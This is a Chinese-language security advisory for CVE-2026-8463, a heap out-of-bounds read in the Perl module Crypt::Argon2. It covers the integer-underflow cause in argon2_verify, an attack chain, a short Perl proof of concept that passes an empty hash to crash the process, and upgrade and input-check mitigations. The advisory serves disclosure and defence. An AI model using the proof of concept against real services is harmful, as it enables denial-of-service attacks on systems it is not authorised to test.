CVE-2026-8463 Crypt::Argon2 堆越界读取漏洞

漏洞信息

漏洞编号

CVE-2026-8463

漏洞类型

堆越界读

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Crypt::Argon2

漏洞概述

Crypt::Argon2 Perl模块在0.017至0.031之前的版本中存在堆越界读取漏洞。当`argon2_verify`函数处理空字符串输入时，因未检查长度导致整数下溢，进而扫描相邻堆内存。攻击者可诱导应用验证空哈希，导致进程崩溃或泄露内存信息，对系统可用性造成影响。

技术细节

该漏洞的核心在于Crypt::Argon2 Perl库中`argon2_verify`函数的实现缺陷。在自动检测模式下，函数试图通过调用`memchr`在编码字符串中查找'$'分隔符。代码直接使用`encoded_len - 1`作为`memchr`的扫描长度参数，却未预先验证`encoded_len`是否大于0。当输入为空字符串时，`encoded_len`为0，无符号整数减法导致下溢，产生`SIZE_MAX`。这使得`memchr`从堆内存起始位置向后扫描极大范围，从而读取越界的堆内存。虽然这主要导致拒绝服务（DoS），但也可能泄露堆内存布局的细微线索。若攻击者能控制应用传入空哈希（例如利用数据库中的空字段或占位符），即可稳定触发此漏洞，造成服务中断。

攻击链分析

STEP 1

侦察

攻击者识别出目标应用程序使用了易受攻击版本的Crypt::Argon2 Perl模块（0.017至0.031之前），且存在可传入空哈希的接口。

STEP 2

触发漏洞

攻击者向应用程序发送特制请求，诱导应用程序调用`argon2_verify`函数，并传入空字符串作为编码哈希参数。

STEP 3

整数下溢

`argon2_verify`函数内部在计算`memchr`长度参数时执行`encoded_len - 1`，由于`encoded_len`为0，导致无符号整数下溢为`SIZE_MAX`。

STEP 4

越界读取

`memchr`函数尝试扫描极大的内存范围以查找'$'字节，导致读取越界的堆内存。

STEP 5

影响实现

越界读取可能导致应用程序段错误崩溃（DoS），或在特定条件下泄露相邻堆内存的信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/perl
use strict;
use warnings;
use Crypt::Argon2;

# Vulnerable version: 0.017 <= v < 0.031
# This PoC demonstrates triggering the heap out-of-bounds read
# by passing an empty string to argon2_verify.

my $empty_hash = ""; # The empty input triggers the underflow

print "Attempting to verify empty hash...\n";

# This call is expected to cause a crash or abnormal behavior
# due to memchr(encoded, '$', SIZE_MAX)
eval {
    argon2_verify($empty_hash, "password");
};

if ($@) {
    print "Error caught: $@";
} else {
    print "Verification returned (unexpectedly).\n";
}

影响范围

Crypt::Argon2 >= 0.017, < 0.031

防御指南

临时缓解措施

建议开发者立即升级到修复版本。若无法立即升级，应在代码层面增加防御性编程：在调用Crypt::Argon2的验证函数之前，检查传入的哈希字符串是否为空。如果哈希为空，应直接拒绝验证请求或返回无效密码错误，避免将空字符串传递给库函数，从而防止整数下溢和堆越界读取。